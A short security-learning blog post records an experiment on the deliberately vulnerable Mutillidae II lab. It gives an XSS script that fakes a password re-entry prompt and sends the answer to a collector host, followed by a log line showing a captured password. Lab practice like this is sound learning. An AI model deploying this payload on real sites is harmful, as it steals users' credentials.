About this blog

I'm a developer with over 10 years experience who wants to transition to infosec. This blog is an informal record of my experiments with OWASP's Mutillidae II, a web application exhibiting a multitude of deliberate vulnerabilities. I will also take Offensive Security's PWK training course and get the OSCP certificate

Wednesday, 31 August 2016

Re-enter pass XSS

Maybe some people would fall for something like this, as a stored or reflected XSS:

<script>new Image().src = "http://localhost/?pass=" + encodeURIComponent(prompt("Please re-enter your password", ""))</script>


127.0.0.1 - - [31/Aug/2016:12:46:39 -0400] "GET /?pass=adminpass HTTP/1.1" 302 -
Posted by at
Labels: , , ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)